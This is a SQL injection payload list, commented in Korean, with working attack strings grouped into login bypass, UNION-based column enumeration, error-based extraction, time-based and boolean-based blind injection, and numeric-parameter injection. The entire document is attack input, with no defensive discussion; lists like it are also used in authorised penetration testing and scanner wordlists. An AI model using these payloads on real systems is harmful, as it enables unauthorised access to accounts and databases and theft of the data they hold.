# SQL Injection Payloads (Quote Balancing Optimized)

# ==================================================
# 1. 로그인 우회 (Authentication Bypass)
# ==================================================
# 앞쪽 따옴표 닫기 + 뒤쪽 주석 처리 (가장 기본)
' OR '1'='1
' OR 1=1-- 
' OR 1=1#
' OR 1=1/*

# Username 필드용 (주석으로 뒤쪽 Password 검증 무시)
admin'-- 
admin' #
admin'/*

# 복합 조건 우회
' OR '1'='1'-- 
' OR '1'='1'#
' OR '1'='1'/*
') OR ('1'='1
') OR ('1'='1'-- 

# ==================================================
# 2. Union-based SQLi (컬럼 개수 맞추기)
# ==================================================
# ==================================================
# Union-based SQLi (Column Count Enumeration 1~10)
# ==================================================

# 1개 컬럼
' UNION SELECT 1-- 
' UNION SELECT 1#

# 2개 컬럼
' UNION SELECT 1,2-- 
' UNION SELECT 1,2#

# 3개 컬럼
' UNION SELECT 1,2,3-- 
' UNION SELECT 1,2,3#

# 4개 컬럼
' UNION SELECT 1,2,3,4-- 
' UNION SELECT 1,2,3,4#

# 5개 컬럼
' UNION SELECT 1,2,3,4,5-- 
' UNION SELECT 1,2,3,4,5#

# 6개 컬럼
' UNION SELECT 1,2,3,4,5,6-- 
' UNION SELECT 1,2,3,4,5,6#

# 7개 컬럼
' UNION SELECT 1,2,3,4,5,6,7-- 
' UNION SELECT 1,2,3,4,5,6,7#

# 8개 컬럼
' UNION SELECT 1,2,3,4,5,6,7,8-- 
' UNION SELECT 1,2,3,4,5,6,7,8#

# 9개 컬럼
' UNION SELECT 1,2,3,4,5,6,7,8,9-- 
' UNION SELECT 1,2,3,4,5,6,7,8,9#

# 10개 컬럼
' UNION SELECT 1,2,3,4,5,6,7,8,9,10-- 
' UNION SELECT 1,2,3,4,5,6,7,8,9,10#

# ==================================================
# 3. Error-based SQLi (에러 유발)
# ==================================================
# 따옴표 닫고 에러 유발 함수 실행
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- 
' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT version()), 0x7e))-- 

# ==================================================
# 4. Time-based Blind SQLi (시간 지연)
# ==================================================
# MySQL
' AND SLEEP(5)-- 
' OR SLEEP(5)-- 
'; SELECT SLEEP(5)-- 

# PostgreSQL
' AND pg_sleep(5)-- 
'; SELECT pg_sleep(5)-- 

# ==================================================
# 5. Boolean-based Blind SQLi (참/거짓 판별)
# ==================================================
# 따옴표 닫고 참/거짓 조건 추가
' AND 1=1-- 
' AND 1=2-- 
' AND '1'='1
' AND '1'='2

# 데이터 길이 추측
' AND LENGTH(database())>1-- 
' AND LENGTH(user())>1-- 

# ==================================================
# 6. Numeric / Integer-based (따옴표 없는 경우 대비)
# ==================================================
# 숫자형 파라미터(id=1) 등에는 따옴표 없이 사용
1 OR 1=1
1 OR 1=1-- 
1 UNION SELECT 1,2,3-- 
1 AND SLEEP(5)
